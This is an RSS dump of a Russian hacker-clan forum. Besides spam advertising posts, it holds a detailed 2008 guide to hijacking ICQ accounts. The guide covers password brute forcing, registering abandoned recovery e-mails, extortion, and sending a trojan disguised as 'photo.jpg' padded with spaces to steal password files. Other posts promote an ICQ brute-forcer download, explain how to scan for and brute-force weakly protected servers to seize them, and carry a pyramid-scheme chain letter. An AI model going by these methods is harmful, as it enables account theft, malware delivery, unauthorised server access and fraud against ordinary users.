http://cah.hitbb.ru/ CAH ru-ru Wed, 15 Sep 2021 12:39:17 +0300 MyBB/mybb.ru http://cah.hitbb.ru/viewtopic.php?pid=37#p37 <p>В начале самоподготовки, когда Вы занимаетесь с первоклассником своим, берите логические задачки для 7 лет <a href="https://childdevelop.ru/worksheets/2725/" rel="nofollow" target="_blank">https://childdevelop.ru/worksheets/2725/</a> - Учим месяцы и времена года. Это задание, которое поможет ребенку выучить месяцы и времена года, а также потренировать мелкую моторику, память и внимание. Рад помочь...</p> mybb@mybb.ru (Сокил Иванов) Wed, 15 Sep 2021 12:39:17 +0300 http://cah.hitbb.ru/viewtopic.php?pid=37#p37 http://cah.hitbb.ru/viewtopic.php?pid=36#p36 <p>Я на десерты обычно на столы на торжества ставлю клубника в шоколаде <a href="https://www.ilikesurprises.ru/" rel="nofollow" target="_blank">здесь</a>. Это и красиво как украшение и вкусно...</p> mybb@mybb.ru (Сокил Иванов) Tue, 20 Jul 2021 12:24:24 +0300 http://cah.hitbb.ru/viewtopic.php?pid=36#p36 http://cah.hitbb.ru/viewtopic.php?pid=35#p35 <p>Мы работаем на 1С. Недавно автоматизировали все бизнес-процессы фармацевтической компании на этой платформы <a href="https://www.assino.ru/resheniya/resheniya-1s/1s-korporatsiya/" rel="nofollow" target="_blank">https://www.assino.ru/resheniya/resheni &#8230; poratsiya/</a> 1С Корпорация. Автоматизация холдингов. Облегчите себе решение ежедневных задач...</p> mybb@mybb.ru (Сокил Иванов) Mon, 24 May 2021 11:23:06 +0300 http://cah.hitbb.ru/viewtopic.php?pid=35#p35 http://cah.hitbb.ru/viewtopic.php?pid=34#p34 <p>Читайте так же бесплатно статьи <a href="https://childdevelop.ru/articles/develop/9823/" rel="nofollow" target="_blank">на сайте Развитие ребенка</a> Почему умные родители печатают задания для ребенка? Задание на бумаге всегда более комплексное и помогает ребенку развивать сразу несколько важных навыков. Учитесь с удовольствием...</p> mybb@mybb.ru (Сокил Иванов) Wed, 19 May 2021 11:28:22 +0300 http://cah.hitbb.ru/viewtopic.php?pid=34#p34 http://cah.hitbb.ru/viewtopic.php?pid=33#p33 <p>Решите в Москве ремонт делать. Вот <a href="https://avalremont.ru/" rel="nofollow" target="_blank">здесь</a> смотрите для себя Ремонт квартир в Москве, разработка дизайн проектов. Мы остались довольны...</p> mybb@mybb.ru (Сокил Иванов) Tue, 09 Feb 2021 14:10:18 +0300 http://cah.hitbb.ru/viewtopic.php?pid=33#p33 http://cah.hitbb.ru/viewtopic.php?pid=32#p32 <p>Работаю сам на себя. Зарабатываю на ставках на спорт. <a href="https://aboutbetting.ru/" rel="nofollow" target="_blank">Здесь</a> главное найти источник самой свежей и актуальной информации из мира ставок на спорт. все просто...</p> mybb@mybb.ru (Сокил Иванов) Tue, 09 Feb 2021 13:34:05 +0300 http://cah.hitbb.ru/viewtopic.php?pid=32#p32 http://cah.hitbb.ru/viewtopic.php?pid=30#p30 <p>А я нашел сайт где можно приобрести уникальные корпоративные шоколадные подарки к Новому году! Вот <a href="https://www.ilikesurprises.ru/korporativnye-podarki-moskva" rel="nofollow" target="_blank">здесь</a> посмотрите, какой полет фантазии за Ваши деньги...</p> mybb@mybb.ru (Сокил Иванов) Fri, 27 Nov 2020 12:58:45 +0300 http://cah.hitbb.ru/viewtopic.php?pid=30#p30 http://cah.hitbb.ru/viewtopic.php?pid=29#p29 <p>Друзья, сейчас очень много разных курсов. Особенно что касается их качества. Вот Вам пример качественного и ответственного подхода&#160; по разным с направлениям: SEO, Маркетинг, Аналитика, Профессии, Продажи, Социальные сети, SMM, PR и реклама, WEB-дизайн, Систематизация и Интернет-магазин, к онлайн вебинарам и&#160; бизнес академиям - <a href="https://meduza.org/" rel="nofollow" target="_blank">https://meduza.org/</a>&#160; Никогда не останавливайтесь на достигнутом...</p> mybb@mybb.ru (Сокил Иванов) Mon, 16 Nov 2020 12:28:13 +0300 http://cah.hitbb.ru/viewtopic.php?pid=29#p29 http://cah.hitbb.ru/viewtopic.php?pid=28#p28 <p>Чтобы рыбалка у Вас удалась, особенно с дальним выездом. Всегда берите с собой эхолот для рыбалки и GPS навигатор, чтобы не потеряться в лесу. Мы когда едем с друзьями все <a href="https://vcentrespb.ru/" rel="nofollow" target="_blank">здесь</a> заказываем. Посмотрите, может что понравится.</p> mybb@mybb.ru (Сокил Иванов) Tue, 29 Sep 2020 13:11:33 +0300 http://cah.hitbb.ru/viewtopic.php?pid=28#p28 http://cah.hitbb.ru/viewtopic.php?pid=27#p27 <p>Друзья, ищите стеклянные фартуки для кухни под заказ? Посмотрите здесь - <a href="https://dvorsky.kiev.ua/katalog/steklyannyie-fartuki/" rel="nofollow" target="_blank">https://dvorsky.kiev.ua/katalog/steklyannyie-fartuki/</a> Нам все подошло и по цене и качеству. Выбор большой.</p> mybb@mybb.ru (Сокил Иванов) Wed, 26 Aug 2020 12:09:51 +0300 http://cah.hitbb.ru/viewtopic.php?pid=27#p27 http://cah.hitbb.ru/viewtopic.php?pid=21#p21 <p>Реальный зароботок в интернете с помощью перамиды:</p> <p>СНАЧАЛА Я ТОЖЕ В ЭТО НЕ ВЕРИЛ, ПОКА САМ НЕ ПОПРОБОВАЛ.</p> <p>А наткнулся на это совершенно случайно.&#160; Бродя, как обычно, по разного рода форумам, вдруг нахожу эту статью, в которой говорится, что&#160; МОЖНО СДЕЛАТЬ ТЫСЯЧИ ДОЛЛАРОВ ЗА ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 210 РУБЛЕЙ&#160; (от себя скажу, что таких денег за две недели Вы явно не увидите,- это произойдёт гораздо позже).&#160; В общем, там говорилось, что надо послать по 30 руб. на 7 интернет-кошельков, которые ниже перечисленны. Затем Вы вписываете номер своего&#160; кошелька и закидываете данное сообщение, но уже с Вами на седьмой строчке, на 200 разных форумов. Вроде бы просто и никаких уловок. Ну я поразмышлял и подумал, что в принципе ничего не теряю кроме 210 рублей - и решил попробовать.&#160; Интернет-кошелёк у меня уже был и я перечислил всем участникам акции из списка по 30 рублей, затем принялся рассылать это объявление по разным форумам. В течении 4-5 дней я зарегестрировался более, чем на 100 форумах и бесплатных досках объявлений, и стал ждать. Прошла неделя, заглядываю в свой кошелёк, а там ничего нового. Ну, плюнул я и бросил это занятие. А ещё недели через две в Интернете,&#160; вдруг нашёл некий комментарий к этому проекту и вновь заглянул в кошелёк, и обнаружил там 900 рублей. Значит 30 человек подключились, но за месяц это всё-равно очень мало. Потом смотрю, а поступлений всё больше и больше, тогда я отправил&#160; объявление ещё на 120 форумов. И тут началось! Деньги стали приходить каждый день и через полтора месяца на моём счету уже было более 30 тысяч рублей, а ещё через два месяца-, ну в общем на работу можно не ходить. Я долго не мог поверить, что это работает, пока не увидел&#160; РЕАЛЬНЫЕ БАБКИ. Но они продолжают приходить и теперь моя работа, это&#160; два-три часа в Инете!&#160; А заработок такой, что мне даже и не снилось.&#160; Теперь, если хотите, я расскажу вам, как это работает и самое главное- ПОЧЕМУ!&#160; Если вы будете в точности соблюдать ниже-перечисленные инструкции, то будете получать&#160; больше денег, чем думали, не прилагая к этому особых усилий. Согласитесь, что это просто, - не нужно покупать бесполезные программы, не нужно учить английский; эта программа основана на добросовестных платёжных отношениях между её участниками и только, где&#160; Ваш вклад составляет всего 210 рублей за несколько переводов.&#160; ПРАВДА, ЕСТЬ ОДНО, НО ОЧЕНЬ ВАЖНОЕ УСЛОВИЕ!!!&#160; Всё это удачно работает благодаря&#160; ПОРЯДОЧНОСТИ&#160; И&#160; ЧЕСТНОСТИ&#160; участников. А ещё необходимо сделать ТРИ шага к успеху:<br />1. Зарегестрируйтесь в системе&#160; WebMoney Transfer, которая находится по адресу&#160; wwwwebmoney.ru, потом загрузите предложенную программу WebMoney Keeper Classic, следуя инструкции, хорошенько ознакомьтесь с данной системой, как она работает.&#160; Обязательно сделайте копию файла ключей на CD носителе, или флэшке. Установите рублёвый интернет-кошелёк, затем выберите оптимальный для себя вариант пополнения и внесите на свой счёт рублей 230 (карточки&#160; WMR&#160; обычно продаются в магазинах электроники и сотовой связи). Лично я перечисляю деньги на свой&#160; WM- кошелёк в магазине &quot;Эльдорадо&quot;, как на мобильный телефон. Поступление средств мгновенное.&#160; Почему именно 230, а не 210 рублей,-объясняю: 230 рублей это необходимый минимум, т.к. все платёжные интернет-системы за денежные операции берут хоть маленький, но процент,- да и кошелёк должен оставаться активным.<br />2. Взяв номер первого кошелька из приведённого ниже списка, отправьте на него 30 рублей. Далее, начиная со второго, по аналогии отправьте по 30 руб. на остальные 6 кошельков (не забудьте вписывать в поле &quot;Примечание&quot; следующее:&#160; &quot;Пожалуйста, внесите меня в список&#160; WM-кошельков&quot;).</p> <p>&#160; &#160;1. R 401140636501<br />&#160; &#160;2. R 979996466328<br />&#160; &#160;3. R 284094443680<br />&#160; &#160;4. R 369879725428<br />&#160; &#160;5. R 337581541097<br />&#160; &#160;6. R 134563609732<br />&#160; &#160;7. R 356952715294</p> <p>Теперь, ВНИМАНИЕ!!!&#160; После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате txt., или ещё как Вам удобней). В скопированной статье вычеркните из списка 1-й кошелёк и переместите 2-й кошелёк на место 1-го, который Вы стёрли, тем самым переместив список на одну строку выше (7-й становится 6-м, 6-й становится 5-м и т.д.). Впишите в 7-ю строчку Ваш кошелёк!<br />3. Весь остальной текст желательно не менять, так как он наиболее понятно излагает смысл. РАЗМЕСТИТЕ эту статью минимум на 200 форумах и новостных лентах (News Groups), или рассылайте по эл.почте, но запомните,- чем больше Вы разместите, тем выше будет Ваш доход, и тут всё зависит только от Вас. А ещё это будет стоить Вам&#160; 210 рублей, плюс мизерный процент за переводы&#160; и&#160; немного работы. По мере накопления средств на Вашем кошельке не забывайте переводить их на свой банковский счёт. Все необходимые инструкции в разделе &quot;Мои WebMoney&quot; Вашей эл.ведомости.<br />Хотя,- Вы можете купить на эти деньги две бутылки водки, выпить её, а утром с тяжёлой головой пойти на работу и снова &quot;вкалывать&quot; на стройке, как я до недавнего времени.&#160; Или ещё где-то; дело Ваше. А можно отнестись к этому серьёзно и, приложив некоторые усилия, а главное - ЧЕСТНОСТЬ, зарабатывать хорошие средства;&#160; решать только Вам!&#160; Ну вот, собственно и всё. <br />Желаю всем удачи!!!</p> mybb@mybb.ru (василич) Thu, 20 Nov 2008 17:43:56 +0300 http://cah.hitbb.ru/viewtopic.php?pid=21#p21 http://cah.hitbb.ru/viewtopic.php?pid=20#p20 <p>Разве тут все способы сложные ? Можно подобрать пароль к аське но время подбора будет зависить от сложности пароля и скорости перебора.. Может занять 5 минут, а может и месяцы.. Самые актуальные способы сейчас, это троян и брут (перебор пароля)...</p> mybb@mybb.ru (AfeR) Wed, 12 Nov 2008 20:26:20 +0300 http://cah.hitbb.ru/viewtopic.php?pid=20#p20 http://cah.hitbb.ru/viewtopic.php?pid=18#p18 <p><span style="color: red">1. Что такое UIN ?</span><br />В ICQ расшифровка UIN - Universal Internet Number. Дословно - универсальный интернет-номер. У каждого пользователя есть свой номер, по котрому он входит в систему (как почтовый адрес) и по которому его могут найти другие пользователи и он сам может найти других.<br />Можно сообщать свой ICQ UIN в визитках и в подписях в электронных письмах, чтобы корреспонденты могли выйти быстро на связь.<br />Также можно расшифровать UIN как User Identification Number - идентификационный номер пользователя. Смысл по большому счету тот же.<br /><span style="color: red">2. Что такое Дедик ?</span><br />Дедик - очевидно, пошло от английского слова &quot;dedicated&quot;, что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация <br />служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.<br /><span style="color: red">3. Что такое Брут ?</span><br />Брут Brute Или Брутфорс - это перебор поролей.. Есть 2 способа перебора, пепреберать 1 пароль на базу пользывателей. Или Переберать базу поролей на одного пользывателя.<br /><span style="color: red">4. Что такое Троян ?</span><br />Это программа, которая как правило выдает себя за что-нибудь мирное и чрезвычайно полезное. Интернет-трояны - программы которые либо дают доступ к компьютеру с другого компа без ведома пользователя (BackDoor), либо высылают по определенному адресу какую-либо информацию с компьютера-жертвы (Trojan.PSW)<br /><span style="color: red">5. Что такое Вирус ?</span><br />Компьютерные вирусы — это программы, которые мешают нормальной работе компьютера, перезаписывают, повреждают или удаляют данные. Они также распространяются между компьютерами в сети и через Интернет, часто замедляя их работу и вызывая другие неполадки.<br /><span style="color: red">6. Что такое компьютерный червь ?</span><br />Компьютерный червь. Это тип вредоносных или как их еще называют – злоумышленных программ. Такие виртуальные черви появились уже давно, наряду с вирусами и шпионскими программами. Компьютерный червь похож на вирус, потому что он попадает в компьютер, прикрепленный к файлу. Но в отличие от вируса, червь имеет свойство воспроизводить себя в вашем компьютере, не требуя каких-либо действий пользователей. Еще одной особенностью компьютерного червя является то, что он распространяется не только по всей области вашего компьютера, но и автоматически рассылает свои копии по электронной почте или другим средствам связи компьютеров между собой.<br /><span style="color: red">7. Что такое Драйвер ?</span><br />За управление аппаратными устройствами компьютера (процессором, памятью, дисководами и устройствами ввода-вывода) отвечают служебные программы - операционная система и драйверы (driver). Драйвер &quot;переводит&quot; команды ОС в конкретные команды, понятные устройству.<br /><span style="color: red">8. Что такое Домен ?</span><br />Доменное имя – это уникальное имя, которое вы выбираете для Вашего веб сайта. Веб сайты идентифицируются в сети Интернет по имени и цифровому IP адресу.<br />На следующем примере мы постараемся объяснить разницу между ссылкой и доменным именем.<br />URL:http://www.something.com/index.html<br />Домен: wwwsomething.com<br />Зарегистрированное доменное имя: something.com<br /><span style="color: red">9. Что такое Хост</span><br />Хостом в сети Internet называются компьютеры, работающие в многозадачной операционной системе (Unix, VMS), поддерживающие протоколы TCP\IP и предоставляющие пользователям какие-либо сетевые услуги.<br /><span style="color: red">10. Что такое Unix\Lunix ?</span><br />Linux - это Unix-подобная (или POSIX-совместимая) операционная система, многопользовательская и многозадачная, распространяемая открыто и свободно.<br /><span style="color: red">11. Что такое Операционная система ?</span><br />Ещё часто называют просто: Ось.. Это программа, управляющая аппаратными и программными средствами компьютера, которые предназначены для выполнения задач пользователя.<br /><span style="color: red">12. Что такое TCP\IP</span><br />TCP/IP (Transmission Control Protocol/Internet Protocol - протокол управления передачей/межсетевой протокол) - базовый протокол Internet, позволяющий обмениваться данными компьютерам, работающим под управлением различных операционных систем. Вообще-то TCP/IP представляет собой целый набор протоколов, но обычно говорят об одном протоколе под общим названием TCP/IP.<br /><span style="color: red">13. Что такое Спам ?</span><br />Массовая рассылка сообщений посредством электронной почты и других средств персонального обмена информацией (включая службы немедленной доставки сообщений, такие как SMS, IRC и т.п.), иначе как по явно и недвусмысленно выраженной инициативе получателей.<br />Открытая публикация адреса электронной почты или другой системы персонального обмена информацией не может служить основанием для включения адреса в какой-либо список для массовой рассылки сообщений. Включение адреса, полученного любым путем (через веб-форму, через подписного робота и т.п.), в список адресов, по которому проводится какая-либо рассылка, допускается только при условии наличия надлежащей технической процедуры подтверждения подписки, гарантирующей, что адрес не попадет в список иначе, как по воле владельца адреса. Процедура подтверждения подписки должна исключать возможность попадания адреса в список адресатов какой-либо рассылки (единичной или регулярной) по инициативе третьих лиц (т.е. лиц, не являющихся владельцами данного адреса).<br /><span style="color: red">14. Что такое Флуд ?</span><br />Флуд, правильно: флад (от англ. flood — наводнение) — пустословие, сообщения в интернет-форумах и чатах, занимающие (во многих случаях) большие объёмы и не несущие никакой-либо информации или очень малое количество полезной информации.<br /><span style="color: red">15. Что такое Троллинг ?</span><br />(от англ. trolling) — размещение в Интернете (на форумах, в группах новостей Usenet, в вики-проектах и др.) провокационных сообщений с целью вызвать флейм, конфликты между участниками, оскорбления, войну правок и т. п.<br /><span style="color: red">16. Кто такой Хакер ?</span><br />ХАКЕР — квалифицированный компьютерный взломщик, злоумышленник, специализирующийся на поиске и использовании несанкционированного доступа в вычислительные сети или другое компьютеризированное оборудование для незаконного получения информации, извлечения выгоды, нанесения ущерба.<br /><span style="color: red">17. Что такое Руткит ?</span><br />Руткит (Rootkit) - Специальные хакерские программы, которые не видны ни антивирусам, ни операционной системе, а потому очень опасны.</p> mybb@mybb.ru (AfeR) Thu, 30 Oct 2008 14:58:38 +0300 http://cah.hitbb.ru/viewtopic.php?pid=18#p18 http://cah.hitbb.ru/viewtopic.php?pid=17#p17 <p><strong><span style="color: red">SBrute</span></strong><br /><span style="color: black">Simple Brute</span><br /><img class="postimg" loading="lazy" src="http://img179.imageshack.us/img179/761/sbrute2kg6.png" alt="http://img179.imageshack.us/img179/761/sbrute2kg6.png" /><br />Это небольшой icq-брутфорсер, работает без проксей (что предполагает невысокую скорость) работает со списком уин;пас.<br />В папке с брутом должно лежать 4 файла:<br />&#160; -source.txt - пары уин;пароль для брута<br />&#160; -bad.txt – номера с неверными паролями<br />&#160; -good.txt – сбрученные номера<br />&#160; -cfg.txt – настройки</p> <p>Добавлена смена пароля на случайный при &quot;сбручивание&quot; номера.<br />Для включения/выключения опции отредактируйте cfg.txt в папке с брутом.<br />Вместо &quot;x&quot; укажите нужное значение:<br />0 - отключить смену пароля<br />1 - включить смену пароля</p><div class="quote-box quote-main"><blockquote><p>&lt;options&gt;<br />&lt;change_passwords&gt;х&lt;/change_passwords&gt;<br />&lt;/options&gt;</p></blockquote></div><p>Настройки загружаются при старте, поэтому изменения в файле без перезапуска программы нечего не дадут.<br />При включенной опции смены пароля в good.txt сохраняется таким образом:</p><div class="quote-box quote-main"><blockquote><p>уин;новый_пароль;старый_пароль</p></blockquote></div><p><a href="http://grabberz.com.ua/release/Sbrute.rar" rel="nofollow" target="_blank"><strong>Скачать</strong><span style="color: gray"></span></a></p> <p><span style="color: silver">Автор: Astako</span></p> mybb@mybb.ru (AfeR) Thu, 30 Oct 2008 14:12:13 +0300 http://cah.hitbb.ru/viewtopic.php?pid=17#p17 http://cah.hitbb.ru/viewtopic.php?pid=16#p16 <p>Угон ICQ уинов&#160; &#160;Вот бывает иногда что хочется именно ЕЁ ;-) Только эту асю я хочу... Вот для таких случаев несколько способом поиметь именно ту, о которой вы всегда мечтали. </p> <p>I. Способ куль-хацкерский. Вы добавляете юзера с нужным уином в контакт. Смотрите его IP. Чтобы его увидеть необходимо, чтобы у того пользователя стояло разрешение на установление прямых IP соединений с другими пользователями ICQ. А чтобы IP начал показыватся в User Details'ах качаем и устанавлием патч для icq 2003 build 3916 от ven000m'a (wwwven000m.net). Затем берете программу ip2uin, указываете ей айпи и она просканит на запущенность аси. Потом попытаеся присоединиться к удаленному компу по открытому порту. которая она будет сканировать, в указанном вами диапазоне. Процент на это 1 из 100, при уловии что на удаленном компьютере не запущен никакой FireWall. Если сработало, то забираете уин и вопрос считаем исчерпанным :). Если не удался (скорее всего), берете любой сетевой сканер и сканируете на расшаренные реусурсы. Процент попадания около 10 из 100. Если сработало, то из папки аси вырываете все .dat файлы (вид: uin.dat, типа 111222.dat, 843092.dat итд) и к себе а винт в папку с установленной асей. Потом берем программу расшифровки dat-файла и уин у вас в кармане. </p> <p>II. Способ женский + научный. Юзера опять в контакты. Затем открываем профиль юзера и открываем блокнот (notepad). И все слова из профиля, вроде ника, имени, фамилии, страны, города, адреса и всяческих комбинаций этого дела вносим через enter в тектовый файл. Затем смотрим мыло. Идем в яндекс или гугл и ищем это мыло. Скорее всего вы найдете много информации на всяких форумах, домашних страничках. Всю информацию в текстовый файл (не прямым текстом :D, а отдельные слова до 8-ми символов включительно). Также можно войти с ним в контакт, познакомиться из того, что он вам расскажет добавить слов. А в идеале, если у вас есть какой-нить форум или чат или что-то такое, где надо регистрироваться, ЗАСТАВЬТЕ его там зарегаться. Тогда он оставит там пароль. А люди как правило используют один и тот же пароль везде. Так что на 90% он ваш. По-любому, добавьте этот пароль в словарь. И добавьте туда этот юин (в смысле, ко всем вашим паролям добавьте юин, т.к. многие пользователи ставят пароль такой же как юин). За 10-30 минут 'работы' у вас должен получиться список слов эдак на 100-400. Потом добавьте туда пару десятков просто общеупотребляемых слов, вроде sex, rock, metal, city, qwerty, asdfg и все в этом роде. После этого брутим (ниже) на эти пассы. Если юин у вас, то все свободны :). Если нет, то способ следующий. </p> <p>III. Способ мыльница. Работает, только если у юзера есть мыло (e-mail). Смотрим в профиле юзера, есть-ли основное мыло. Если есть, то читаем. Смотрим внимательно на мыло. Если оно вида 'хрен_знает_что.какой-нить_известный_бесплатный_мыльный_домен', то нам повезло. Шанс на это 1 из 500. Например, если мыло fsdlhfslfhlsjghlp@yandex.ru. Тогда скорее всего этого мыла в действительности не существует. Если это так, идем на этот сервак (в нашем случае, яндекс.ру) и регистрируем это мыло. Идем сюда и говорим что пароль бы нам надо получить. Указываем наш юин и ваше только что созданное мыло и жмем заветную кнопку. Через минуту у вас в ящике должен лежать пароль. Если все ок и юин ваш, до свидания :). </p> <p>IV. Способ паяльник. Берем из раздела 'программы' или здесь V-ListMakeR, при помощи него создаем словарик метров эдак на 40. Хотя лучше взять просто обычный словарь в электронном виде. Создаем при мощи этой же проги файл типа Uin;pass и суем его в IPDBrute. И если повезет, то через пару суток вы взломаете эту асю ;-) </p> <p>V. Способ страшный. Тут все просто. Добавляем юзера в контакт и пишем ему открытым текстом на всех доступных языках: мне нужен твой юин, меняю на другой 6-знак. Я могу спокойно сломать вашу асю, но мне этого не хочется. Так что у вас 3 дня подумать. И предлагайте юин покрасивше. Потом меняете. </p> <p>VI. Способ спам. Опять же, только если у выбранного вами уина есть primary e-mail. Берем програмку для отправки писем с чужого адреса. А теперь с его адреса рассылаем кучу спама через smtp сервер его мыла. И идем жаловаться в суппорт сервера, на котором его мыло. Жалуемся, жалуемся, а потом его отрыбают и регистрируем мыло на себя ;-) </p> <p>VII. Троян. Что тут можно сказать. Все что Вам нужно - это хороший троян + немного смекалки. Трой не обязательно должен не ловиться антивирусом. Как Вы думаете, какой процент того что у данного юзера стоит антивирус, тем более обновленный если всего пользователей в Мире около 295 миллионов, а 'защищенных' из них 17.750.000 я думаю всего 16% приблизительно . Если он все же стоит, тогда придется применять не этот метод или искать троян которого не ловит антивирус. Допустим антивируса нету ...что делаем? Не сразу же кидать троя. Придется уговаривать. Как это сделать? Скажите, что посылаете прикольную фотку. Но если мы пошлем ему троя, он же сразу увидит расширение *.exe. Поэтому делаем следующее: берем сервак трояна, допустим под названием 'server.exe' и переделываем его следующим образом: Вместо server пишем photo, но как быть с расширением? После слова photo, ставим точку, и пишем расширение jpg, а потом ставим кучу пробелов, то есть получается </p> <p>photo.jpg.........................................exe. Только вместо точек пробелы. Дело в том, что когда ламер получает файл и хочет его сохранить, имя файла получается настолько длинное, что видно только photo.jpg (посыл через ICQ). Естественно, если растянуть окно закачки файла, то все будет видно, но я Вас уверяю, что это делает всего 1, максимум 2 процента из 100. Ламер открывает файл и начинает ныть, что у него ничего не открывается. Вы говорите, что понятии не имеете в чем дело и что у Вас все гуд. Потом делаете так: заходите в С:program filesicq, а дальше смотрите сами где находится его dat файл. Если это аська 99b, то в папке Db99, если аська 2000a или 2000b, то в папке 2000. Там лежит файл под названием 'номер его аськи.dat'. Закачиваете его к себе и в общем все. Теперь надо его расшифровать. Для этого есть много программ, лучшая из которых на мой взгляд icq information v1.3. Там все будет понятно. Так, взяли пароль, хотя нет, Вы же взяли dat, а знаете что это означает? Весь его контакт лист и хистори будут у Вас (при условии, что у Вас стоит версия более поздняя чем у него, или хотя бы такая же. Если у Вас 99b а у него 2000*, тогда контакт не удастся взять). Регим асю, меняем пароль и сразу же меняем Priamary E-mail на свое мыло, что бы он потом не получил пароль от Мираба (AOL`а) по мылу. И все... </p> <p>VIII. Смекалка. Как вы думаете сколько простаков из 100.000.000 с лишнем пользователей ICQ? Правильно думаете - много. Итак, какие же пароли они используют? Да самые простые и известные, например 'qwerty' (первые шесть букв слева направо верхней строчки клавы), а может и чего проще - '12345'. Или насмотревшись фильма 'Хакеры' всовывают 'God', 'Sex','Love'. Но как узнать какой из 100 миллионов юзеров вписывает простой пароль? Это совсе не сложно. Просто ищите юзера у которого Nickname, Lastname и Firstname одинаковое. Допусти 12345 - Nick, 12345 - Lastname и 12345 - Firstname. Скорее всего таких юзеров с ником с именем и фамилией очень много (из них процентов 20 дебилов точно, которые и пароль пишут такой же - 12345). Такие-же действия можно проводить и с 'qwerty', 'God', 'Love', 'Sex', их куча...очень много, все ограничено только Вашей фантазией. При одном заходе можно спереть от 5-20 юинов. Но неужели Вы будете каждый раз в аське пробивать пароли путем 'Add another registered user' ..это очень долго. Есть специальные проги, типа - ICQ FORCE. Прога по брутфорсу паролей. </p> <p>IX. Другой порт. По-умолчанию ICQ идет по 5190 порту, который так и называется Mirabilis ICQ. А прикиньте, кто-нить ломанет Мираб, он упадет на недельку, а Вы в это время быстренько делаете мнимый сервак у себя на компе и все подключаются к Вам и все пароли у Вас . Конечно это все в пределах мечтаний, слишком много НО, да и Мираб пока еще не скидывали, хотя сервак (небольшой правда, на пару-тройку асек) создать вполне реально. Для этого нужна спец. прога - ISpyU v0.0.2. Ну так вот, главное, что Вам надо сделать - это запудрить мозги юзеру с которым Вы общаетесь и чей UIN хотите получить. Нужно сделать так, чтобы он поверил что 5190 порт - отстой и переставился на порт, который Вы ему скажете, а на нем уже будет стоять icq server, к которому он и подключится. И пароль у Вас. </p> <p>X. Bruteforce Priamary E-mail. Взлом любого мыла таит в себе большую тонкость. Один из способов взлома - Bruteforce, то есть прямой перебор паролей. Для этого нужны некоторые программы, их много, но я бы посоветовал воспользоваться Brutus AET-2 и XaviorBeta. Проги не простые, скажу сразу, придется разбираться и регистрацию тяжело достать тоже. Но все равно это находка, попробуйте - все работает.</p> mybb@mybb.ru (AfeR) Thu, 30 Oct 2008 14:03:17 +0300 http://cah.hitbb.ru/viewtopic.php?pid=16#p16 http://cah.hitbb.ru/viewtopic.php?pid=15#p15 <p>что нужно делать</p> mybb@mybb.ru (Mila) Thu, 30 Oct 2008 13:54:31 +0300 http://cah.hitbb.ru/viewtopic.php?pid=15#p15 http://cah.hitbb.ru/viewtopic.php?pid=14#p14 <p>CAH - Clan Activ Hacker<br />Открыт набор в хак группу, в наборе правила только:<br />1. Желание и ощущение мозгов в голове<br />2. Не участие в других хак кланах<br />3. Доверие и дружелюбность к участникам какими бы ламерами оне небыл</p> mybb@mybb.ru (AfeR) Tue, 21 Oct 2008 22:01:48 +0400 http://cah.hitbb.ru/viewtopic.php?pid=14#p14 http://cah.hitbb.ru/viewtopic.php?pid=13#p13 <p>Что такое дедик? <br />Дедик - очевидно, пошло от английского слова &quot;dedicated&quot;, что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация <br />служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации. </p> <p>Как подключиться к дедику? <br />Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск =&gt; Программы =&gt; Стандартные =&gt; Связь =&gt; Подключение к удаленному рабочему столу. Можно еще так: Пуск =&gt; Выполнить =&gt; mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика. Можно еще Радмином юзать дедик если <br />он установлен на дедике. </p> <p>На что требуется обращать внимание при выборе дедика? <br />Канал, Память(RAM), Камень(процессор), ОС. Вот примеры: <br />Цитата:Intel® Pentium® 4 CPU 2.80GHz, 3.00 GB of RAM\2003 os\1 gb <br />Intel® Pentium® 4 CPU 3.20GHz, 2.00 GB of RAM\2003 os\100 mb <br />Intel® Xeon™ CPU 3.06GHz\3.80 GB of RAM\2003 os\100 mb </p> <p>Для чего нужен дедик? <br />Ну к примеру для брута, флуда, спама icq, мыла. </p> <p>Где достать дедик? <br />Есть два способа добывание дедика! <br />1) Это конечно покупка. Хорошие дедики можно купить у de1et-icq#-366055, 0.p.т.i.ђ-icq#-788897. <br />2) Взлом сервера. </p> <p>Как взломать дедик? <br />Можно простыми TCP/IP сканерами насканить дедики Значит так, есть такая программа, которую в сети вам найти будет вполне по силам и называется она NTSCAN. Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, &quot;ping from host&quot; - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей). <br />Еще есть php сканер который написал gemaglabin. Его юзать легко просто даем на съедение ip-адресса, и ждем.(чесно сказать он сейчас пашет или нет но я юзал давно его помог) <br />Скачать можно от сюда: <br />.::Скачать::. </p> <p>Не подскашешь какие порты надо сканить? <br />TCP порты: 3389 - это порт, используемый программой Remote Desktop <br />Порт 4899, который используется радмином - прогой Remote Administrator. </p> <p>Есть дедик, хочу добавить нового юзера. Как это реализовать? <br />Пример работы ОС Windows 2000. <br />Открывай Administrative Tools =&gt; Computer Management =&gt; находим там вкладку Local Users and Groups 